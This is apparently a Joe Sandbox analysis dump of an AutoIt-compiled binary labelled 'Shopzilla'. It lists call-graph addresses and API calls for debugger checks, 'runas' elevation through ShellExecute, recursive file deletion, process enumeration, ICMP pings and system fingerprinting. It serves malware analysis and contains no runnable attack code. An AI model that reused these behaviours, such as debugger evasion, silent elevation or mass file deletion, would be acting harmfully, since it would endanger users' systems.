102432->102433 102437 ba1338 _memmove 102432->102437 102435 bc0f16 Mailbox 59 API calls 102433->102435 102434 bc0f16 Mailbox 59 API calls 102436 ba134f 102434->102436 102435->102437 102436->102397 102437->102434 102622 bb4b29 102438->102622 102443 bf083b 102446 bb4a2f 84 API calls 102443->102446 102444 bb49ed LoadLibraryExW 102632 bb4ade 102444->102632 102448 bf0842 102446->102448 102450 bb4ade 3 API calls 102448->102450 102452 bf084a 102450->102452 102451 bb4a14 102451->102452 102658 bb4ab2 102452->102658 102671 bb4b77 102622->102671 102625 bb4b50 102627 bb49d4 102625->102627 102628 bb4b60 FreeLibrary 102625->102628 102626 bb4b77 2 API calls 102626->102625 102629 bc53ab 102627->102629 102628->102627 102675 bc53c0 102629->102675 102631 bb49e1 102631->102443 102631->102444 102756 bb4baa 102632->102756 102635 bb4b03 102637 bb4a05 102635->102637 102638 bb4b15 FreeLibrary 102635->102638 102636 bb4baa 2 API calls 102636->102635 102639 bb48b0 102637->102639 102638->102637 102640 bc0f16 Mailbox 59 API calls 102639->102640 102641 bb48c5 102640->102641 102642 bb433f 59 API calls 102641->102642 102643 bb48d1 _memmove 102642->102643 102644 bb490c 102643->102644 102646 bf078a 102643->102646 102647 bb4a6e 69 API calls 102644->102647 102645 bf0797 102766 c09dcb 95 API calls 102645->102766 102646->102645 102765 c09d45 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 102646->102765 102657 bb4915 102647->102657 102650 bb4ab2 74 API calls 102650->102657 102652 bf07d9 102654 bb4a8c 85 API calls 102654->102657 102656 bb49a0 102656->102451 102657->102650 102657->102652 102657->102654 102657->102656 102659 bf08c5 102658->102659 102660 bb4ac4 102658->102660 102872 bc5732 102660->102872 102663 c09531 102997 c09387 102663->102997 102672 bb4b44 102671->102672 102673 bb4b80 LoadLibraryA 102671->102673 102672->102625 102672->102626 102673->102672 102674 bb4b91 GetProcAddress 102673->102674 102674->102672 102677 bc53cc _fseek 102675->102677 102676 bc53df 102724 bc8c88 58 API calls __getptd_noexit 102676->102724 102677->102676 102679 bc5410 102677->102679 102694 bd0648 102679->102694 102680 bc53e4 102725 bc8f16 9 API calls _fseek 102680->102725 102683 bc5415 102684 bc541e 102683->102684 102685 bc542b 102683->102685 102726 bc8c88 58 API calls __getptd_noexit 102684->102726 102687 bc5455 102685->102687 102688 bc5435 102685->102688 102709 bd0767 102687->102709 102727 bc8c88 58 API calls __getptd_noexit 102688->102727 102689 bc53ef _fseek @_EH4_CallFilterFunc@8 102689->102631 102695 bd0654 _fseek 102694->102695 102696 bc9d6b __lock 58 API calls 102695->102696 102697 bd0662 102696->102697 102698 bd06dd 102697->102698 102704 bc9df3 __mtinitlocknum 58 API calls 102697->102704 102707 bd06d6 102697->102707 102732 bc6dad 59 API calls __lock 102697->102732 102733 bc6e17 LeaveCriticalSection LeaveCriticalSection _doexit 102697->102733 102734 bc897d 58 API calls 2 library calls 102698->102734 102701 bd06e4 102701->102707 102735 bc9f8b InitializeCriticalSectionAndSpinCount 102701->102735 102702 bd0753 _fseek 102702->102683 102704->102697 102706 bd070a EnterCriticalSection 102706->102707 102729 bd075e 102707->102729 102718 bd0787 __wopenfile 102709->102718 102710 bd07a1 102740 bc8c88 58 API calls __getptd_noexit 102710->102740 102711 bd095c 102711->102710 102716 bd09bf 102711->102716 102713 bd07a6 102741 bc8f16 9 API calls _fseek 102713->102741 102715 bc5460 102728 bc5482 LeaveCriticalSection LeaveCriticalSection _fprintf 102715->102728 102737 bd8701 102716->102737 102718->102710 102718->102711 102718->102718 102742 bc392b 60 API calls 2 library calls 102718->102742 102720 bd0955 102720->102711 102743 bc392b 60 API calls 2 library calls 102720->102743 102722 bd0974 102722->102711 102744 bc392b 60 API calls 2 library calls 102722->102744 102724->102680 102725->102689 102726->102689 102727->102689 102728->102689 102736 bc9ed5 LeaveCriticalSection 102729->102736 102731 bd0765 102731->102702 102732->102697 102733->102697 102734->102701 102735->102706 102736->102731 102745 bd7ee5 102737->102745 102740->102713 102741->102715 102742->102720 102743->102722 102744->102711 102746 bd7ef1 _fseek 102745->102746 102747 bd7f07 102746->102747 102750 bd7f3d 102746->102750 102757 bb4af7 102756->102757 102758 bb4bb3 LoadLibraryA 102756->102758 102757->102635 102757->102636 102758->102757 102759 bb4bc4 GetProcAddress 102758->102759 102759->102757 102765->102645 102766->102657 102875 bc574d 102872->102875 102874 bb4ad5 102874->102663 102876 bc5759 _fseek 102875->102876 102877 bc579c 102876->102877 102878 bc576f _memset 102876->102878 102879 bc5794 _fseek 102876->102879 102880 bc6d6e __lock_file 59 API calls 102877->102880 102902 bc8c88 58 API calls __getptd_noexit 102878->102902 102879->102874 102881 bc57a2 102880->102881 102888 bc556d 102881->102888 102884 bc5789 102903 bc8f16 9 API calls _fseek 102884->102903 102892 bc5588 _memset 102888->102892 102895 bc55a3 102888->102895 102892->102895 102902->102884 102903->102879 103000 bc535a GetSystemTimeAsFileTime 102997->103000 103001 bc5388 __aulldiv 103000->103001 103257 ba5ff5 103271 ba5ede Mailbox _memmove 103257->103271 103258 bc0f16 59 API calls Mailbox 103258->103271 103259 ba6a9b 103461 baa9de 434 API calls 103259->103461 103260 ba53b0 434 API calls 103260->103271 103262 bdef29 103473 ba5190 59 API calls Mailbox 103262->103473 103263 ba6abc 103471 c0a2fa 89 API calls 4 library calls 103263->103471 103265 bdef37 103474 c0a2fa 89 API calls 4 library calls 103265->103474 103269 bdef1b 103315 ba5569 Mailbox 103269->103315 103472 bf6ad4 59 API calls Mailbox 103269->103472 103270 ba60e5 103270->103263 103272 bde067 103270->103272 103281 ba63bd Mailbox 103270->103281 103287 ba6152 Mailbox 103270->103287 103271->103258 103271->103259 103271->103260 103271->103262 103271->103263 103271->103265 103271->103270 103273 bb1c9c 59 API calls 103271->103273 103276 bb1a36 59 API calls 103271->103276 103280 c1c11d 434 API calls 103271->103280 103271->103315 103460 ba523c 59 API calls 103271->103460 103465 c07d7e 59 API calls Mailbox 103271->103465 103466 bf6ad4 59 API calls Mailbox 103271->103466 103272->103281 103462 bf7890 59 API calls 103272->103462 103273->103271 103275 bc0f16 Mailbox 59 API calls 103279 ba63d1 103275->103279 103276->103271 103279->103263 103282 ba63de 103279->103282 103280->103271 103281->103275 103286 ba6426 103281->103286 103283 ba6413 103282->103283 103284 bde0a2 103282->103284 103283->103286 103316 ba5447 Mailbox 103283->103316 103463 c1c644 85 API calls 2 library calls 103284->103463 103464 c1c791 95 API calls Mailbox 103286->103464 103287->103263 103301 ba61bf 103287->103301 103467 bf7890 59 API calls 103287->103467 103291 bde0cd 103291->103291 103293 bdf095 103476 c0a2fa 89 API calls 4 library calls 103293->103476 103294 bde5c1 103468 c0a2fa 89 API calls 4 library calls 103294->103468 103295 bc0f16 59 API calls Mailbox 103295->103316 103297 ba69fa 103307 bb1c9c 59 API calls 103297->103307 103300 bb1c9c 59 API calls 103300->103316 103301->103263 103301->103269 103304 bde2fd VariantClear 103301->103304 103301->103315 103322 c1e3d4 130 API calls 103301->103322 103323 c03fa7 3 API calls 103301->103323 103324 c03f97 3 API calls 103301->103324 103325 c1ef7a 91 API calls 103301->103325 103328 c15be2 103301->103328 103353 bad679 103301->103353 103393 bacfd7 103301->103393 103412 c0d52b 103301->103412 103459 ba5190 59 API calls Mailbox 103301->103459 103302 bde5d0 103303 bde9ca 103309 bb1c9c 59 API calls 103303->103309 103304->103301 103305 ba69ff 103305->103293 103305->103294 103307->103315 103309->103315 103310 bb1207 59 API calls 103310->103316 103311 bdea97 103311->103315 103469 bf7890 59 API calls 103311->103469 103312 bf7890 59 API calls 103312->103316 103313 bc2ea0 67 API calls __cinit 103313->103316 103316->103294 103316->103295 103316->103297 103316->103300 103316->103303 103316->103305 103316->103310 103316->103311 103316->103312 103316->103313 103316->103315 103317 bdee58 103316->103317 103319 ba5a1a 103316->103319 103457 ba7e50 434 API calls 2 library calls 103316->103457 103458 ba6e30 60 API calls Mailbox 103316->103458 103470 c0a2fa 89 API calls 4 library calls 103317->103470 103475 c0a2fa 89 API calls 4 library calls 103319->103475 103322->103301 103323->103301 103324->103301 103325->103301 103329 c15c0b 103328->103329 103330 c15c39 WSAStartup 103329->103330 103332 ba502b 59 API calls 103329->103332 103331 c15c62 103330->103331 103345 c15c4d Mailbox 103330->103345 103333 bb40cd 59 API calls 103331->103333 103334 c15c26 103332->103334 103335 c15c6b 103333->103335 103334->103330 103336 ba502b 59 API calls 103334->103336 103337 ba4d37 84 API calls 103335->103337 103338 c15c35 103336->103338 103339 c15c77 103337->103339 103338->103330 103340 bb402a 61 API calls 103339->103340 103341 c15c84 inet_addr gethostbyname 103340->103341 103342 c15ca2 IcmpCreateFile 103341->103342 103341->103345 103343 c15cc6 103342->103343 103342->103345 103344 bc0f16 Mailbox 59 API calls 103343->103344 103346 c15cdf 103344->103346 103345->103301 103347 bb433f 59 API calls 103346->103347 103348 c15cea 103347->103348 103349 c15cf9 IcmpSendEcho 103348->103349 103350 c15d1a IcmpSendEcho 103348->103350 103351 c15d32 103349->103351 103350->103351 103352 c15d99 IcmpCloseHandle WSACleanup 103351->103352 103352->103345 103354 ba4f98 59 API calls 103353->103354 103355 bad691 103354->103355 103356 bc0f16 Mailbox 59 API calls 103355->103356 103361 be4f98 103355->103361 103358 bad6aa 103356->103358 103360 bad6ba 103358->103360 103491 bb3df7 60 API calls Mailbox 103358->103491 103363 ba4d37 84 API calls 103360->103363 103362 bad6df 103361->103362 103496 c0fa24 59 API calls 103361->103496 103364 ba502b 59 API calls 103362->103364 103368 bad6ec 103362->103368 103365 bad6c8 103363->103365 103366 be4fe0 103364->103366 103367 bb3e47 67 API calls 103365->103367 103366->103368 103369 be4fe8 103366->103369 103370 bad6d7 103367->103370 103477 bb41d6 103368->103477 103371 ba502b 59 API calls 103369->103371 103370->103361 103370->103362 103495 bb3f0b FindCloseChangeNotification 103370->103495 103374 bad6f3 103371->103374 103375 be4ffa 103374->103375 103376 bad70d 103374->103376 103378 bc0f16 Mailbox 59 API calls 103375->103378 103377 bb1207 59 API calls 103376->103377 103379 bad715 103377->103379 103380 be5000 103378->103380 103492 bb3b7b 65 API calls Mailbox 103379->103492 103382 be5014 103380->103382 103385 bb3ea1 2 API calls 103380->103385 103387 be5018 _memmove 103382->103387 103482 c07aec 103382->103482 103384 bad724 103384->103387 103493 ba4f3c 59 API calls Mailbox 103384->103493 103385->103382 103388 bad738 Mailbox 103389 bad772 103388->103389 103390 bb42cf FindCloseChangeNotification 103388->103390 103389->103301 103391 bad766 103390->103391 103391->103389 103494 bb3f0b FindCloseChangeNotification 103391->103494 103394 ba4d37 84 API calls 103393->103394 103395 bad001 103394->103395 103497 ba5278 103395->103497 103397 bad018 103398 bad57b 103397->103398 103399 ba502b 59 API calls 103397->103399 103407 bad439 Mailbox __wsetenvp 103397->103407 103398->103301 103399->103407 103400 bc305f _W_store_winword 60 API calls 103400->103407 103401 bb162d 59 API calls 103401->103407 103402 ba4f98 59 API calls 103402->103407 103404 bc0b90 62 API calls 103404->103407 103406 ba4d37 84 API calls 103406->103407 103407->103398 103407->103400 103407->103401 103407->103402 103407->103404 103407->103406 103408 ba502b 59 API calls 103407->103408 103409 bb1821 59 API calls 103407->103409 103410 bb59d3 94 API calls 103407->103410 103411 bb5ac3 Shell_NotifyIconW 103407->103411 103502 bb153b 59 API calls 2 library calls 103407->103502 103503 ba4f3c 59 API calls Mailbox 103407->103503 103408->103407 103409->103407 103410->103407 103411->103407 103413 c0d54a 103412->103413 103414 c0d555 103412->103414 103415 ba502b 59 API calls 103413->103415 103418 bb1207 59 API calls 103414->103418 103450 c0d62f Mailbox 103414->103450 103415->103414 103416 bc0f16 Mailbox 59 API calls 103417 c0d678 103416->103417 103419 c0d684 103417->103419 103504 bb3df7 60 API calls Mailbox 103417->103504 103420 c0d579 103418->103420 103423 ba4d37 84 API calls 103419->103423 103422 bb1207 59 API calls 103420->103422 103424 c0d582 103422->103424 103425 c0d69c 103423->103425 103426 ba4d37 84 API calls 103424->103426 103427 bb3e47 67 API calls 103425->103427 103428 c0d58e 103426->103428 103429 c0d6ab 103427->103429 103430 bc0044 59 API calls 103428->103430 103431 c0d6e3 103429->103431 103432 c0d6af GetLastError 103429->103432 103433 c0d5a3 103430->103433 103436 c0d745 103431->103436 103437 c0d70e 103431->103437 103434 c0d6c8 103432->103434 103435 bb17e0 59 API calls 103433->103435 103441 c0d638 Mailbox 103434->103441 103505 bb3f0b FindCloseChangeNotification 103434->103505 103438 c0d5d6 103435->103438 103439 bc0f16 Mailbox 59 API calls 103436->103439 103440 bc0f16 Mailbox 59 API calls 103437->103440 103442 c0d600 Mailbox 103438->103442 103443 c03f97 3 API calls 103438->103443 103444 c0d74a 103439->103444 103445 c0d713 103440->103445 103441->103301 103447 ba502b 59 API calls 103442->103447 103448 c0d5e6 103443->103448 103444->103441 103451 bb1207 59 API calls 103444->103451 103449 c0d724 103445->103449 103452 bb1207 59 API calls 103445->103452 103447->103450 103448->103442 103453 bb1a36 59 API calls 103448->103453 103506 c00267 59 API calls 2 library calls 103449->103506 103450->103416 103450->103441 103451->103441 103452->103449 103455 c0d5f7 103453->103455 103456 c03d8a 63 API calls 103455->103456 103456->103442 103457->103316 103458->103316 103459->103301 103460->103271 103461->103263 103462->103281 103463->103286 103464->103291 103465->103271 103466->103271 103467->103287 103468->103302 103469->103315 103470->103319 103471->103269 103472->103315 103473->103269 103474->103269 103475->103315 103476->103315 103478 bb410a 2 API calls 103477->103478 103479 bb41f7 103478->103479 103480 bb410a 2 API calls 103479->103480 103481 bb420b 103480->103481 103481->103374 103483 c07af7 103482->103483 103484 bc0f16 Mailbox 59 API calls 103483->103484 103485 c07afe 103484->103485 103486 c07b0a 103485->103486 103487 c07b2b 103485->103487 103489 bc0f16 Mailbox 59 API calls 103486->103489 103488 bc0f16 Mailbox 59 API calls 103487->103488 103490 c07b13 _memset 103488->103490 103489->103490 103490->103387 103491->103360 103492->103384 103493->103388 103494->103389 103495->103361 103496->103361 103498 bc0f16 Mailbox 59 API calls 103497->103498 103499 ba5285 103498->103499 103500 ba5294 103499->103500 103501 bb1a36 59 API calls 103499->103501 103500->103397 103501->103500 103502->103407 103503->103407 103504->103419 103505->103441 103506->103441

                                              Control-flow Graph

                                              APIs
                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB526C
                                              • IsDebuggerPresent.KERNEL32 ref: 00BB527E
                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00BB52E6
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                                • Part of subcall function 00BABBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BABC07
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BB5366
                                              • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00BF0AAE
                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00BF0AE6
                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C55230), ref: 00BF0B69
                                              • ShellExecuteW.SHELL32(00000000), ref: 00BF0B70
                                                • Part of subcall function 00BB514C: GetSysColorBrush.USER32(0000000F), ref: 00BB5156
                                                • Part of subcall function 00BB514C: LoadCursorW.USER32(00000000,00007F00), ref: 00BB5165
                                                • Part of subcall function 00BB514C: LoadIconW.USER32(00000063), ref: 00BB517C
                                                • Part of subcall function 00BB514C: LoadIconW.USER32(000000A4), ref: 00BB518E
                                                • Part of subcall function 00BB514C: LoadIconW.USER32(000000A2), ref: 00BB51A0
                                                • Part of subcall function 00BB514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BB51C6
                                                • Part of subcall function 00BB514C: RegisterClassExW.USER32(?), ref: 00BB521C
                                                • Part of subcall function 00BB50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BB5109
                                                • Part of subcall function 00BB50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BB512A
                                                • Part of subcall function 00BB50DB: ShowWindow.USER32(00000000), ref: 00BB513E
                                                • Part of subcall function 00BB50DB: ShowWindow.USER32(00000000), ref: 00BB5147
                                                • Part of subcall function 00BB59D3: _memset.LIBCMT ref: 00BB59F9
                                                • Part of subcall function 00BB59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BB5A9E
                                              Strings
                                              • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00BF0AA8
                                              • AutoIt, xrefs: 00BF0AA3
                                              • runas, xrefs: 00BF0B64
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                              • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                              • API String ID: 529118366-2030392706
                                              • Opcode ID: 460ef5fa0982adc7f7312f19dc49de226b26e1138fd4a33cf6554398b1304347
                                              • Instruction ID: 40470936f8ca7f03b1f243c6a23327af1e45758f4514f2863f2face11ae5dad1
                                              • Opcode Fuzzy Hash: 460ef5fa0982adc7f7312f19dc49de226b26e1138fd4a33cf6554398b1304347
                                              • Instruction Fuzzy Hash: CD510471904248ABCF21EBB5DCA5FFEBBF8EB05740B1401E9F552622A2CAF05549CB25

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00BC01AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB2A58,?,00008000), ref: 00BC01CF
                                                • Part of subcall function 00C04E59: GetFileAttributesW.KERNELBASE(?,00C03A6B), ref: 00C04E5A
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00C03C03
                                              • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C03CAB
                                              • MoveFileW.KERNEL32(?,?), ref: 00C03CBE
                                              • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C03CDB
                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C03CFD
                                              • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C03D19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 4002782344-1173974218
                                              • Opcode ID: 6d1512f2d5a42b461c5233b1172085a929f957c14e7d05e20ca17ae585ecc25d
                                              • Instruction ID: b1cb3901817ee1a0404ce6c318fdc49e359c02d5a13caf6a91c25d642cfe4207
                                              • Opcode Fuzzy Hash: 6d1512f2d5a42b461c5233b1172085a929f957c14e7d05e20ca17ae585ecc25d
                                              • Instruction Fuzzy Hash: 5D51817180014DABCF15EBA4C9669FEB7BDAF11300F604299E452B7092EF716F09DB60

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1105 bb5d13-bb5d73 call bb1207 GetVersionExW call bb1821 1110 bb5d79 1105->1110 1111 bb5e78-bb5e7a 1105->1111 1113 bb5d7c-bb5d81 1110->1113 1112 bf0f29-bf0f35 1111->1112 1116 bf0f36-bf0f3a 1112->1116 1114 bb5e7f-bb5e80 1113->1114 1115 bb5d87 1113->1115 1117 bb5d88-bb5dbf call bb1981 call bb133d 1114->1117 1115->1117 1118 bf0f3d-bf0f49 1116->1118 1119 bf0f3c 1116->1119 1128 bf1018-bf101b 1117->1128 1129 bb5dc5-bb5dc6 1117->1129 1118->1116 1120 bf0f4b-bf0f50 1118->1120 1119->1118 1120->1113 1122 bf0f56-bf0f5d 1120->1122 1122->1112 1124 bf0f5f 1122->1124 1127 bf0f64-bf0f6a 1124->1127 1130 bb5e00-bb5e17 GetCurrentProcess IsWow64Process 1127->1130 1131 bf101d 1128->1131 1132 bf1034-bf1038 1128->1132 1133 bf0f6f-bf0f7a 1129->1133 1134 bb5dcc-bb5dcf 1129->1134 1139 bb5e19 1130->1139 1140 bb5e1c-bb5e2d 1130->1140 1137 bf1020 1131->1137 1141 bf103a-bf1043 1132->1141 1142 bf1023-bf102c 1132->1142 1135 bf0f7c-bf0f82 1133->1135 1136 bf0f97-bf0f99 1133->1136 1134->1130 1138 bb5dd1-bb5def 1134->1138 1143 bf0f8c-bf0f92 1135->1143 1144 bf0f84-bf0f87 1135->1144 1146 bf0fbc-bf0fbf 1136->1146 1147 bf0f9b-bf0fa7 1136->1147 1137->1142 1138->1130 1145 bb5df1-bb5df7 1138->1145 1139->1140 1149 bb5e98-bb5ea2 GetSystemInfo 1140->1149 1150 bb5e2f-bb5e3f call bb55f0 1140->1150 1141->1137 1148 bf1045-bf1048 1141->1148 1142->1132 1143->1130 1144->1130 1145->1127 1151 bb5dfd 1145->1151 1155 bf0fe5-bf0fe8 1146->1155 1156 bf0fc1-bf0fd0 1146->1156 1152 bf0fa9-bf0fac 1147->1152 1153 bf0fb1-bf0fb7 1147->1153 1148->1142 1154 bb5e65-bb5e75 1149->1154 1162 bb5e8c-bb5e96 GetSystemInfo 1150->1162 1163 bb5e41-bb5e4e call bb55f0 1150->1163 1151->1130 1152->1130 1153->1130 1155->1130 1161 bf0fee-bf1003 1155->1161 1158 bf0fda-bf0fe0 1156->1158 1159 bf0fd2-bf0fd5 1156->1159 1158->1130 1159->1130 1164 bf100d-bf1013 1161->1164 1165 bf1005-bf1008 1161->1165 1167 bb5e56-bb5e5a 1162->1167 1170 bb5e50-bb5e54 GetNativeSystemInfo 1163->1170 1171 bb5e85-bb5e8a 1163->1171 1164->1130 1165->1130 1167->1154 1169 bb5e5c-bb5e5f FreeLibrary 1167->1169 1169->1154 1170->1167 1171->1170
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 00BB5D40
                                                • Part of subcall function 00BB1821: _memmove.LIBCMT ref: 00BB185B
                                              • GetCurrentProcess.KERNEL32(?,00C30A18,00000000,00000000,?), ref: 00BB5E07
                                              • IsWow64Process.KERNEL32(00000000), ref: 00BB5E0E
                                              • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00BB5E54
                                              • FreeLibrary.KERNEL32(00000000), ref: 00BB5E5F
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00BB5E90
                                              • GetSystemInfo.KERNEL32(00000000), ref: 00BB5E9C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                              • String ID:
                                              • API String ID: 1986165174-0
                                              • Opcode ID: ead1892df9f7c786bfa431f86e2f76fcf02b463a59db83f60251b6803f33dc7c
                                              • Instruction ID: cbbcac7f7d7595061cb693faa0142334f3770706bdd2317f6c89e3adb05216b7
                                              • Opcode Fuzzy Hash: ead1892df9f7c786bfa431f86e2f76fcf02b463a59db83f60251b6803f33dc7c
                                              • Instruction Fuzzy Hash: EA91B431549BC4DEC732DB7894616FABFE5AF29300B9849DDD0C693A01D270F548C76A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1172 c03e72-c03eb9 call bb1207 * 3 call bc01af call c04e59 1183 c03ec9-c03efa call bc0044 FindFirstFileW 1172->1183 1184 c03ebb-c03ec4 call bb1900 1172->1184 1188 c03f69-c03f70 FindClose 1183->1188 1189 c03efc-c03efe 1183->1189 1184->1183 1190 c03f74-c03f96 call bb1cb6 * 3 1188->1190 1189->1188 1191 c03f00-c03f05 1189->1191 1193 c03f44-c03f56 FindNextFileW 1191->1193 1194 c03f07-c03f42 call bb1c9c call bb17e0 call bb1900 DeleteFileW 1191->1194 1193->1189 1195 c03f58-c03f5e 1193->1195 1194->1193 1207 c03f60-c03f67 FindClose 1194->1207 1195->1189 1207->1190
                                              APIs
                                                • Part of subcall function 00BC01AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BB2A58,?,00008000), ref: 00BC01CF
                                                • Part of subcall function 00C04E59: GetFileAttributesW.KERNELBASE(?,00C03A6B), ref: 00C04E5A
                                              • FindFirstFileW.KERNELBASE(?,?), ref: 00C03EE9
                                              • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C03F39
                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C03F4A
                                              • FindClose.KERNEL32(00000000), ref: 00C03F61
                                              • FindClose.KERNEL32(00000000), ref: 00C03F6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                              • String ID: \*.*
                                              • API String ID: 2649000838-1173974218
                                              • Opcode ID: 20a09b7933eedeabffca3cfbc64e398bc73ac4a2ba3ad707a93f16667d6c705b
                                              • Instruction ID: e7d730e4f89d3e7f8cc9a8b5c5b3e73b15f963a7d251670efbaf0c304d8f4bb9
                                              • Opcode Fuzzy Hash: 20a09b7933eedeabffca3cfbc64e398bc73ac4a2ba3ad707a93f16667d6c705b
                                              • Instruction Fuzzy Hash: FC316D710183859FC305EF68C8A5AEFB7ECAF91300F844E9DF4E582191DB61DA09C766
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00C03FDA
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00C03FE8
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00C04008
                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00C040B2
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2941850054.0000000000BA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BA0000, based on PE: true
                                              • Associated: 0000000A.00000002.2941823679.0000000000BA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2941948303.0000000000C55000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942037506.0000000000C5F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2942066359.0000000000C68000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_ba0000_Shopzilla.jbxd
                                              Similarity
                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3243318325-0
